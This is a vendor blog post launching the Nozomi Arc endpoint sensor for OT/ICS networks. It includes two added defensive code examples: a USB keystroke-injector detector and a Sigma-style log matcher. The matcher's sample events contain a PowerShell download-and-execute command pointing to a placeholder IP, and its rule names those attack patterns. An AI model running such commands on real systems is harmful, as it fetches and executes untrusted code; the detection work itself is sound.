Get More Insight into Endpoint Activity and Threats with Nozomi Arc

We are very excited to launch the newest member of our product portfolio, Nozomi Arc. Arc is our first endpoint security sensor. It complements your Guardian and Vantage deployments with more visibility into a host's attack surfaces and anomalies, giving a more detailed view of your complete OT/ICS environment. It improves operational resiliency by significantly extending visibility across endpoint attack surfaces, reducing exposure to security threats, and speeding deployment across all assets and sites. Existing customers will want to give it a quick try, since it is easy to deploy and appears directly in your Nozomi dashboard. New customers will find the enhanced Nozomi portfolio a more complete and highly scalable option for securing their critical infrastructure.

More Visibility, More Insight, More Security

As most Nozomi Networks fans and industry experts know, OT/ICS security began with passive network monitoring. With a primary objective of not disrupting existing systems and processes, and with protocol and bandwidth constraints in many environments, assets, vulnerabilities and threats had to be identified from network traffic rather than through the more direct or proactive techniques available on the IT and data center side of the house.

As the industry and its technology evolved, customers kept looking to capture more insight and data from key resources, and to capture it more frequently, to get a better idea of security threats and to detect vulnerabilities and process anomalies. A few years ago, Nozomi Networks introduced Smart Polling, which lets customers proactively poll endpoints to get more data more often, but the polling still originates from a Guardian network sensor. Customers often had use cases and deployment scenarios that required deeper endpoint analysis and more continuous monitoring than Smart Polling alone could provide.

Nozomi Arc fills that gap with a sensor that runs directly on the endpoint, giving us access to more of the attack surface, more frequently than was possible before. Why would it make sense to turn any or all of your endpoints into security sensors as well?

Why Add Nozomi Arc?

First, we can detect more threats, malicious or compromised hosts, and even insider threats than with a network sensor alone. For example, Nozomi Arc lets you monitor every USB device attached to the host. We can identify a device that presents itself as a memory stick but actually acts as a keyboard, logging or injecting keystrokes. We can identify malware introduced from a USB device, whether the user intended it or not. None of this would be possible if you were waiting for the host to send traffic past your network sensor before you could identify the threat.
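
To make the "memory stick that types" case concrete, here is an added example of the kind of descriptor-level check an endpoint sensor can apply. It is not Nozomi Arc code (the post does not describe how Arc implements its USB checks). The device list, the `STORAGE_WORDS` heuristic and the `ALLOWLIST` VID:PID values are constructed for the example; the class codes are the standard USB-IF ones.

```python
"""Flag USB devices whose interface descriptors contradict what they claim to be.

Added example, not Nozomi Arc code. DEVICES are constructed in the shape Linux
exposes under /sys/bus/usb/devices: sysfs path, idVendor, idProduct, product
string and one (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol)
triple per interface. Nothing here reads a real bus."""

USB_CLASS_HID = 0x03              # USB-IF class codes
USB_CLASS_MASS_STORAGE = 0x08
HID_BOOT_KEYBOARD = (0x01, 0x01)  # (subclass boot, protocol keyboard)
STORAGE_WORDS = ("disk", "flash", "storage", "drive", "memory stick")

# Hypothetical site allowlist of approved idVendor:idProduct pairs (assumed values).
ALLOWLIST = {(0x1234, 0x0001), (0x1234, 0x0010)}

DEVICES = [  # constructed descriptors
    {"path": "1-1", "idVendor": 0x1234, "idProduct": 0x0001,
     "product": "USB Flash Disk", "interfaces": [(0x08, 0x06, 0x50)]},
    # Same VID:PID and product string as the approved stick, plus a hidden
    # boot keyboard interface: a spoofed ID alone passes the allowlist.
    {"path": "1-2", "idVendor": 0x1234, "idProduct": 0x0001,
     "product": "USB Flash Disk",
     "interfaces": [(0x08, 0x06, 0x50), (0x03, 0x01, 0x01)]},
    # Keyboard-only device with a storage-sounding name and an unknown ID.
    {"path": "1-3", "idVendor": 0xABCD, "idProduct": 0x0002,
     "product": "Flash Disk", "interfaces": [(0x03, 0x01, 0x01)]},
    # Approved keyboard: HID is expected here.
    {"path": "1-4", "idVendor": 0x1234, "idProduct": 0x0010,
     "product": "Keyboard",
     "interfaces": [(0x03, 0x01, 0x01), (0x03, 0x00, 0x00)]},
]


def analyze_device(dev, allowlist=ALLOWLIST):
    """Return a list of finding tags; an empty list means nothing suspicious."""
    findings = []
    classes = {cls for cls, _, _ in dev["interfaces"]}
    has_hid = USB_CLASS_HID in classes
    has_boot_keyboard = any(cls == USB_CLASS_HID and (sub, proto) == HID_BOOT_KEYBOARD
                            for cls, sub, proto in dev["interfaces"])
    looks_like_storage = (USB_CLASS_MASS_STORAGE in classes or
                          any(w in dev["product"].lower() for w in STORAGE_WORDS))
    approved = (dev["idVendor"], dev["idProduct"]) in allowlist

    # A "memory stick" that can type is the classic keystroke-injector profile.
    if looks_like_storage and has_hid:
        findings.append("masquerade")
    # A keyboard appearing on an OT host under an unknown ID deserves a look.
    if has_boot_keyboard and not approved:
        findings.append("new_keyboard")
    if not approved:
        findings.append("unknown_device")
    return findings


def scan(devices, allowlist=ALLOWLIST):
    """Map sysfs path -> findings for every device that raised at least one."""
    report = {}
    for dev in devices:
        findings = analyze_device(dev, allowlist)
        if findings:
            report[dev["path"]] = findings
    return report
```

Device `1-2` is the point of the example: its vendor and product IDs are copied from an approved stick, so an allowlist alone says nothing, and only the extra HID interface in the descriptors gives it away. That is why the check keys on what the device can do (its interface classes) rather than on what it says it is.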

Nozomi Arc can also monitor host log files and analyze them with Sigma rules, searching for event patterns that could indicate a threat or an attack in progress. Sigma is an open, vendor- and platform-agnostic format for describing log-based detections, so rules can be shared across communities and converted to the query language of whatever backend you use. Rules are written in YAML and play the same role for log events that YARA rules play for files and Snort rules play for network traffic. It gives customers an easy way to build their own custom queries and to search for and filter anomalous events in their environment.
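
To show what a Sigma rule actually does when it is evaluated against log events, here is an added example of a minimal matcher. It is not Nozomi Arc's detection engine and not a rule from the Sigma project: the rule, the placeholder parent process name `approved_orchestrator.exe` and the Sysmon-style events are constructed for this illustration. The rule is written as a Python dict that mirrors the YAML layout (title, logsource, named selections, condition) so the example runs without a YAML library, and the condition evaluator goes slightly beyond the single rule shown, handling any combination of `and`, `or`, `not` and parentheses.

```python
"""Minimal Sigma-style matcher run over constructed endpoint log events.

Added illustration, not Nozomi Arc code. RULE mirrors a Sigma YAML document
(title, logsource, detection with named selections and a condition) as a dict
so it runs without a YAML library. EVENTS are constructed Sysmon-style
process-creation records, not captures from a real host."""
import fnmatch
import re

# Hypothetical rule (assumption): script hosts started with an encoded or
# download-cradle command line, excluding a placeholder orchestration agent.
RULE = {
    "title": "Suspicious Script Host Command Line",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\wscript.exe", "\\cscript.exe"],
            "CommandLine|contains": ["-enc ", "DownloadString", "IEX "],
        },
        # approved_orchestrator.exe is a placeholder, not a real product name
        "filter": {"ParentImage|endswith": "\\approved_orchestrator.exe"},
        "condition": "selection and not filter",
    },
}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed sample events
    {"id": 1, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"},
    {"id": 2, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe \"C:\\Users\\oper\\report.vbs\""},
    {"id": 3, "Image": PS,
     "ParentImage": "C:\\Program Files\\Orchestrator\\approved_orchestrator.exe",
     "CommandLine": "powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="},
    {"id": 4, "Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/a.ps1')"},
]


def _match_value(modifier, actual, expected):
    """Apply one Sigma value modifier; plain values are case-insensitive globs."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return fnmatch.fnmatchcase(a, e)


def _match_selection(selection, event):
    """Fields in a selection are ANDed; a list of values for one field is ORed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(modifier, event[field], v) for v in values):
            return False
    return True


def _evaluate_condition(condition, results):
    """Recursive-descent evaluator for selection names joined by and/or/not and
    parentheses (assumption: no '1 of them' style aggregations). Precedence is
    not > and > or, as in Sigma."""
    tokens = re.findall(r"\(|\)|\w+", condition)

    def parse_or(i):
        val, i = parse_and(i)
        while i < len(tokens) and tokens[i] == "or":
            rhs, i = parse_and(i + 1)
            val = val or rhs
        return val, i

    def parse_and(i):
        val, i = parse_not(i)
        while i < len(tokens) and tokens[i] == "and":
            rhs, i = parse_not(i + 1)
            val = val and rhs
        return val, i

    def parse_not(i):
        if tokens[i] == "not":
            val, i = parse_not(i + 1)
            return not val, i
        if tokens[i] == "(":
            val, i = parse_or(i + 1)
            return val, i + 1  # skip the closing ')'
        return results[tokens[i]], i + 1  # KeyError: undefined selection name

    return parse_or(0)[0]


def match_rule(rule, event):
    """True when the rule's condition holds for this event."""
    det = rule["detection"]
    results = {name: _match_selection(sel, event)
               for name, sel in det.items() if name != "condition"}
    return _evaluate_condition(det["condition"], results)


def run(rule, events):
    """Return the ids of the events the rule fires on."""
    return [e["id"] for e in events if match_rule(rule, e)]
```

Calling `run(RULE, EVENTS)` fires on events 1 and 4: event 2 is a script host without any of the suspicious command-line fragments, and event 3 matches the selection but is suppressed by the `filter` block through `not filter`. Note that a filter whose field is absent from an event simply does not match, so it never suppresses anything by accident; that is the Sigma semantics a real backend converter preserves as well.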

Continuous Monitoring at Scale

Another primary advantage of Nozomi Arc is its ability to monitor and analyze endpoint attributes and behavior even when the host is not putting packets on the network, which is all a network-based sensor has to go on. The ability to continuously monitor endpoints, including those unreachable from any Guardian sensor, can help detect emerging threats earlier than was previously possible. This extends to mobile devices that are periodically offline, and to transportation environments such as ships that are not connected to their port SOCs and central data aggregation points. Arc can cover many of the visibility gaps that Nozomi customers and prospects want to fill.

Speeding Time to Visibility

Nozomi Arc may also prove logistically easier to deploy than network-based sensors, allowing customers to accelerate security projects at new sites and in greenfield environments. While network-based sensors like Guardian are passive and non-intrusive, they have to be fed from a switch mirror or SPAN port. In mission-critical environments, reconfiguring switches or adding SPAN ports may not be possible until a scheduled maintenance window that may be weeks or months out.

Because it installs on the endpoint as a lightweight executable, Nozomi Arc can usually be installed at any time and can start collecting data not only from the local host but from neighboring devices on the subnet through our Smart Polling feature. This gives organizations a fast path to asset visibility and to monitoring network connections and device behavior while the install of a network-based view is being scheduled.

Nozomi Arc was designed for some of the largest industrial enterprises in the world. Other OT/ICS security solutions are beginning to offer ways to get asset data from unconnected or offline devices, but unlike Nozomi Arc, they tend to be manually installed applications that require a manual sync with the network data capture engine and are tedious to deploy at scale. Arc sensors can be deployed through the automation platforms that roll out endpoint applications to hundreds of hosts or more, as needed. Policies can determine where, when and for how long the sensors are installed, how frequently they collect data and how much data to aggregate on the Guardian/Vantage platform. This gives customers the flexibility to meet the requirements of their sensitive networks and operational environments.

Getting More Comprehensive Visibility

The name of the game in OT and ICS security is a fast, low-impact path to more visibility, more frequently, with automated analytics and correlation. Nozomi Arc brings the complementary endpoint visibility that customers never had with a purely network-based approach. It provides insight into more types of attacks by monitoring USB connections, log files, local network traffic, user activity and more.

Nozomi Arc isn't a replacement for traditional EDR or XDR endpoint security solutions. It feeds relevant asset and threat data to the rest of the Nozomi platform through either Guardian or Vantage, where it is correlated with network-based activity for a more complete view of security risks and remediation steps, specifically in OT and ICS environments.

Existing customers will want to try Arc on at least a few devices to see what it can do. Or we can schedule a demo to show how it integrates with the Guardian and Vantage dashboards and how it can help your security and compliance processes.